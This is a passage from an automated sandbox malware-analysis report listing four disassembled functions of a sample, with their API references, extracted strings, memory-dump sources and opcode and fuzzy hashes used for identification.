                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                              • Instruction Fuzzy Hash: A491B675E0022A9BEB10CF6ACC886FEB7A9AF54364F70451AE855EF2D1DB308940D761
                                              Function 36974C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$Flst
                                              • API String ID: 0-758220159
                                              • Opcode ID: 0543846c895bbe972d55edda01e77da4900beefd6aef0871b527874f91d2e889
                                              • Instruction ID: 702dd880d3aee1b19d0f25fca619f7588254d9aa100209b2c5262d61790cc06b
                                              • Opcode Fuzzy Hash: 0543846c895bbe972d55edda01e77da4900beefd6aef0871b527874f91d2e889
                                              • Instruction Fuzzy Hash: 405180B5E10218CFEF14CF95C844699FBF9EF44B94F35802AD0899B252EBB0A945CB94
                                              Function 369404E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • kLsE, xrefs: 36940540
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3694063D
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                              • API String ID: 3446177414-2547482624
                                              • Opcode ID: 9cd202f3e57a23fe280d83920f77be7156f75114662641ae44bd6a73c7ceb812
                                              • Instruction ID: 7c5e9c604dc22da30bcb715f138327a4bce10ccdcf450e958d8e8b9fe2b88312
                                              • Opcode Fuzzy Hash: 9cd202f3e57a23fe280d83920f77be7156f75114662641ae44bd6a73c7ceb812
                                              • Instruction Fuzzy Hash: 8F51EFB59147428FD325EF25C840697B7E8EF84304F21893EE9DA87240E730D585CB92
                                              Function 369CCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 369CCFBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4Cw@4Cw
                                              • API String ID: 4062629308-3101775584
                                              • Opcode ID: a46511e2b2d9540314f132b2d0a7dc5f16e2c953565d837760aa23fd0ee90ac1
                                              • Instruction ID: 953486cc4f2e83f2b6433c2a2bdcb6c4da40076bef0369fce8cdd7c9021d423a
                                              • Opcode Fuzzy Hash: a46511e2b2d9540314f132b2d0a7dc5f16e2c953565d837760aa23fd0ee90ac1
                                              • Instruction Fuzzy Hash: EC4191B5D00264DFDB21DFA9CC40AADBBB8FF45B40F20406AEA05DB251E735C905DB66
                                              Function 3693DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: 0$0
                                              • API String ID: 3446177414-203156872
                                              • Opcode ID: a92b4860fab9917beb12abbd91f61e38d4e9199edc52459ec6663a8e92d9005e
                                              • Instruction ID: 0280cf4d1f2b29417d930d3823994aa43c63c91ef4ca5f8347de4905273b4879
                                              • Opcode Fuzzy Hash: a92b4860fab9917beb12abbd91f61e38d4e9199edc52459ec6663a8e92d9005e
                                              • Instruction Fuzzy Hash: 8D416BB5A197059FD300CF28C894A56BBE8BB88354F24492EF588DB341D771E909CF96